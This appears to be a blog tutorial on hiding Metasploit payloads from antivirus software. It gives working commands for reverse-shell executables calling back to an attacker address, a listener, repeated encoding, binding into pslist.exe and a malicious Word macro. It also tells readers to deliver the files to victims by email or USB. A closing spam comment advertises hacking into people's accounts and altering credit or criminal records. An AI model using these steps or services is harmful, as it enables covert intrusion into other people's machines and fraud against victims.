By Using Backtrack 5 And Metaspoilt.
All antivirus software is based upon the idea of malware signatures. What this means is that the antivirus software
publishers simply keep track of what the malicious software looks
like—when your Anti-virus software updates each day, it picks all new
signatures. When it detects something that looks like one the recorded
signatures, the software alert the user and quarantine's the malicious
software.
So What are we Going to do ? We are simply going to change our Msf-Payload Signature.HOW ? Keep reading -
So What Do We Need ?
Backtrack 5
Capability to Sit For Long Duration
A LOT of brain and some patience.
Method 1:Metasploit Antivirus Bypass -
A skilled intruder who delivers a payload to your network in the form of
an email message will want to make sure the payload can evade detection
by antivirus software.90% Of the anti-virus programs depends upon the
malware-signature database to recognize harmful files from normal
files.We will now create a file that will (try to) slip through antiviruses.
The Metasploit penetration testing framework provides a collection of
tools you can use to test a network by attacking it the way an intruder
would attack it. Metasploit’s "msfpayload" option helps you to create a
standalone binary to serve as a malicious payload, and the msfencode
option encodes the binary to confuse the antivirus scanners. Msfpayload allows you to generate shellcode, executables,etc.So Here We Go :
BUT Before we encode the payload to bypass antivirus detection's ,We
Will create a stand-alone binary with msfpayload. Msfpayload creates a
binary that launches a simple reverse shell, allowing a remote user to connect to the victim’s machine.We can narrow down the list of available payloads with the "msfpayload -l |grep windows" command, which gives a list of payloads that are specific to windows operating systems.
We will start by trying the Windows meterpreter reverse_tcp payload, see :
The windows/meterpreter/reverse_tcp payload will connect back to the
attacker,as done in earlier tutorials,injecting the meterpreter server
DLL via the reflective Dll injection payload.The O command-line argument
shows all the available configurable options :
I create the payload with the the following command:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.245.134 LPORT=4444 X /root/Desktop/evi1.exe
All you need to do now (if the victim pc is not equipped with
anti-virus) is deliver the file,which is easy,send it bonded into
another application or attached via a mail,or plug in the usb and click
on it.If it has a program,read more-
In order to take advantage of the victim running the executable, We need
to have a listener running on the attack machine. To listen for the
victim running the executable, use the following command:
msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.1.134 lport=4444 E
This command will open up a listener on the local machine over port 4444
and, once the victim runs the executable, will open a meterpreter shell
on the victim’s Windows box :
Now that the payload is working, the next step is to find a way to avoid
antivirus detection. Since you can't have multiple antivirus running on
your pc to check the file,we are going to take the help of website
called Virus Total, This site has a collection of multiple antiviruses that will scan the file.Shitty Luck our file got deteced by most of the programs.
In hopes of achieving a better result, We will bring in msfencode and to
try and get past the antivirus vendors. To DO THIS(hard,very hard), You
will need to pipe the raw output of msfpayload as input to msfencode
using the "shikata ga nai"(chinese) encoder. The encoder will output a a
windows binary:
msfpayload windows/shell_reverse_tcp LHOST=192.168.1.134 LPORT=4444 R
| msfencode -e x86/shikata_ga_nai -t exe > /root/Desktop/evil.exe
The results still show several hits with antivirus scanners,
so we will take another approach. Some anti-virus work on
"signature-based technology", and the payload shell_reverse_tcp shows up
right away, So we can try using the alternative
"windows/shell/reverse_tcp" payload instead of
windows/shell_reverse_tcp:
msfpayload windows/shell/reverse_tcp LHOST=192.168.1.134 LPORT=4444 R
| msfencode -t exe -x /root/Desktop/pslist.exe -o
/root/Desktop/pslist2.exe -e x86/shikata_ga_nai -c 10
We can also try additional steps to hide the payload. This time, take an executable from the Sysinternals
site called pslist.exe and encode it 10 times with "shikata_ga_nai".
The payload is combined with the sysinternal tool pslist.exe and renamed
to pslist2.exe. Try it again On virus total site,Only detected by a few
Anti-virus,YAYYY !
However, several common scanners did not identify the exploit. Use the msfcli command to set up a listener.
If the payload happens to slips through, it will open a shell on your
backtrack os with ADMIN privileges on the windows system.(now thats what
i'm talking about)
VBS Script Infection : The Ultimate Trick.
As you can see from the previous attempts, although it is possible to
slip past a specific scanner with a specific exploit, in general,
anti-virus are very effective with their jobs (not like the government
peeps). Another way to deliver a dangerous payload is using a Word
document. Word documents are very commonly moved around by email and
opened by many people. A Word doc is a great attack vector. Metasploit
has some built-in methods for infecting Word documents with malicious
Metasploit payloads.
Start by creating a VBScript payload:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.134 LPORT=4444 ENCODING=shikata_ga_nai X > evi1payload.exe
Now convert this executable to a VBScript using a script found in the Tools section of Metasploit. Just copy the evi1payload.exe (name of my file) to the Tools folder.
cp /opt/framework3/msf3/evilpayload.exe /opt/framework3/msf3/tools
Inside the Tools folder, you will find a script called "exe2vba.rb". Issue the following command to convert the .exe to a .vbs:
ruby exe2vba.rb evilpayload.exe evi1_payload.vbs
Now copy evil_payload.vbs to a Windows machine that has Microsoft Word
installed, Open up evil_payload.vbs with Notepad, and open a blank
Microsoft Word document. In Microsoft Word 2003, go to Tools-> Macros-> Visual Basic Editor, OR go to "View Macros" if you are using Microsoft Word 2010
or higher. Then copy the first portion of "evil_payload.vbs" from "Sub
Auto_Open() to End Sub" and paste it into the Visual Basic Editor in
either Microsoft Word 2003 or 2007 or Higher.See Below For Suggestions -
Then copy the portion from "PAYLOAD DATA" to the end into the body of the Word document.
Now We will verify that this word document can get past anti-viruses, upload it to Virus Total and see if it catches anything.
NONE FOR ME (suck it avg and bit-defender )
The Word doc slips past all the antivirus vendors.Now be Crafty and get a
click on this script by the victim computer. Once you have delivered
the Word document to your intended victim, make sure you have the
Metasploit client listener up and running on the attack machine.
Do you need to increase your credit score?
ReplyDeleteDo you intend to upgrade your school grade?
Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
Do you need any information concerning any database.
Do you need to retrieve deleted files?
Do you need to clear your criminal records or DMV?
Do you want to remove any site or link from any blog?
you should contact this hacker, he is reliable and good at the hack jobs..
contact : cybergoldenhacker at gmail dot com